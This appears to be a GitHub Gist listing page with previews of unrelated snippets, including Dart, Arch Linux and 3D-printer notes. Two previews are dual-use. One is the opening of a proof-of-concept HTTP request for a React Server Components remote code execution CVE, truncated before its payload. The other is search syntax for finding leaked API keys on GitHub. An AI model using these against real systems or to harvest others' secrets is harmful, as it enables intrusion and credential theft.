Skip to content

Instantly share code, notes, and snippets.

@maple3142
maple3142 / CVE-2025-55182.http
Last active December 5, 2025 05:15
CVE-2025-55182 React Server Components RCE POC
POST / HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Next-Action: x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Length: 459
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"

GitHub Search Syntax for Finding API Keys/Secrets/Tokens

As a security professional, it is important to conduct a thorough reconnaissance. With the increasing use of APIs nowadays, it has become paramount to keep access tokens and other API-related secrets secure in order to prevent leaks. However, despite technological advances, human error remains a factor, and many developers still unknowingly hardcode their API secrets into source code and commit them to public repositories. GitHub, being a widely popular platform for public code repositories, may inadvertently host such leaked secrets. To help identify these vulnerabilities, I have created a comprehensive search list using powerful search syntax that enables the search of thousands of leaked keys and secrets in a single search.

Search Syntax:

(path:*.{File_extension1} OR path:*.{File_extension-N}) AND ({Keyname1} OR {Keyname-N}) AND (({Signature/pattern1} OR {Signature/pattern-N}) AND ({PlatformTag1} OR {PlatformTag-N}))

Examples:

**1.

AI Context: Freezed (Dart/Flutter) v3.0.0 Guide

1. Overview & Purpose

Freezed is a code generator for data classes, tagged unions (sealed classes), and cloning in Dart. It handles toString, operator ==, hashCode, and copyWith generation automatically.

  • Version: 3.0.0 (Requires Dart 3.0+ for pattern matching features).
  • Core Philosophy: Immutable by default, concise syntax using factory constructors.

2. Installation & Setup

@khanhduytran0
khanhduytran0 / mount_args.h
Created February 18, 2025 01:51
Boot tvOS on compatible iDevices (WIP)
#ifndef _MOUNT_ARGS_H
#define _MOUNT_ARGS_H
#include <stdint.h>
#include <sys/time.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/types.h>
enum {
@aamiaa
aamiaa / CompleteDiscordQuest.md
Last active December 5, 2025 05:10
Complete Recent Discord Quest

Complete Recent Discord Quest

Note

This does not works in browser for quests which require you to play a game! Use the desktop app to complete those.

How to use this script:

  1. Accept a quest under Discover -> Quests
  2. Press Ctrl+Shift+I to open DevTools
  3. Go to the Console tab
  4. Paste the following code and hit enter:
@patrikalienus
patrikalienus / orca-find-bambu.py
Last active December 5, 2025 05:02
Make Orca Slicer discover your printer
# My computer is on ethernet and the Bambu printer is on WLAN. These two networks can communicate with
# eachother, but OrcaSlicer is still not able to discover the printer. This will "trick" Orca into
# discovering the printer and connect to its IP. I've tested this extensively and working as expected.
# I have full control over the printer that is in LAN only mode. I have to have it in LAN only mode
# because I don't want to install their coming update which will decrease the usability of the printer
# if you're using Orca - and so many are.
#
# Change the parameters to fit your environment and run it after launching Orca.
import socket
@GrumpyChunks
GrumpyChunks / ArchInstallation.md
Last active December 5, 2025 04:58
Arch Linux Installation on a mid-2015 MacBook Pro

Install Arch Linux on a mid-2015 MacBook Pro

This is based upon the LearnLinux.tv guide and this OdinsPlasmaRifle's gist

Assumptions

  • /dev/sda1 will be our EFI partition
  • /dev/sda2 will be an encryprted LVM ext4 filesystem

Installation Steps